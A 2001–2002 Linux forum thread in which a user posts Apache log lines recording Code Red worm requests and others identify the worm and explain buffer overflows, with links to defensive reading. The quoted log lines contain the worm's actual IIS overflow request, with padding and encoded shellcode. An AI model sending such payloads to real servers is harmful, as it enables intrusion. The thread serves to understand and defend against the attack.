attacking by http via port 80

LionKing · 08-06-2001, 10:11 AM

Hi, I noticed my httpd access_log contains lot of access (see bellow) which appears to be attempts of breaking in. Could someone shed some lights what type of attack are these? what security holes it was targeting and the best way to deny such attack. thank you.

[...snip]

cx733813-a.sking1.ri.home.com - - [06/Aug/2001:12:07:36 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX X%
u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u000 3%
u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 307
cx592009-c.btnrug1.la.home.com - - [06/Aug/2001:12:10:22 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XX
%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u00 03
%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 307
cc29277-a.srst1.fl.home.com - - [06/Aug/2001:12:12:42 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX% u9
090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003% u8
b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 307
cx592009-c.btnrug1.la.home.com - - [06/Aug/2001:12:14:41 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XX
%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u00 03
%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 307
h24-78-84-46.vc.shawcable.net - - [06/Aug/2001:12:15:40 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX X%
u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u000 3%
u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 307
cx1228736-a.elcjn1.sdca.home.com - - [06/Aug/2001:12:16:36 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XX
XX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u 00
03%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 307
cc224520-b.burl1.nj.home.com - - [06/Aug/2001:12:26:16 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX %u
9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003 %u
8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 307
cr476321-a.flfrd1.on.wave.home.com - - [06/Aug/2001:12:30:18 -0500] "GET /default.ida?XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XX
XXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3 %u
0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 307
cc1066214-a.chmbl1.ga.home.com - - [06/Aug/2001:12:37:02 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XX
%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u00 03
%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 307
24-159-100-30.hsacorp.net - - [06/Aug/2001:12:38:12 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9 09
0%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8 b0
0%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 307
node18246.a2000.nl - - [06/Aug/2001:12:41:39 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u68 58
%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u53 1b
%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 307
[....snip]

drjimstuckinwin · 08-06-2001, 11:04 AM

Hi
I think this is mk2 code red. I think I saw this log text at www.grc.com there's a whole page on code red.
How to be safe...
Don't use MS products.
Jim

mcleodnine · 08-06-2001, 02:11 PM

Uh Huh. See http://www.linuxquestions.org/questi...?threadid=5039

mcleodnine · 08-06-2001, 03:18 PM

S'more logs and links to stories at www.rivergems.com/codered.html

drjimstuckinwin · 08-07-2001, 06:14 PM

On thinking about it, it was your post I saw the log data in.
OK so my memory nearly works right!

Matique · 12-11-2002, 05:11 PM

How would someone exploit the http port? Im new to this game and need to secure my linux box.

unSpawn · 12-12-2002, 09:55 AM

Well, the do not "exploit the http port", but the application that is running bound to that port (it's just a way of defining stuff more clearly). If you've read the other threads mentioned you know by now you system is not vulnerable to this IIS crap, but in general you could say applications are vulnerable when they do not validate input properly, for instance for expected value length. Under such circumstances it would be possible to supply arguments that will force execution of something else (unexpected, but then again Nobody Expects The Spanish Inquisition :-] ).
This is what they call a buffer overflow or BO for short.
Here's some docs you may want to read.
If not, then at least read A Comparative Analysis of Methods of Defense against Buffer Overflow Attacks and A Buffer Overflow Study because they provide explanation and guidance on how to minimalize risks.

Also search this forum for the basic security docs, we're posting it aprox. once each month. Apache docs can be found easily Googling the web.

Matique · 12-12-2002, 12:08 PM

Cheers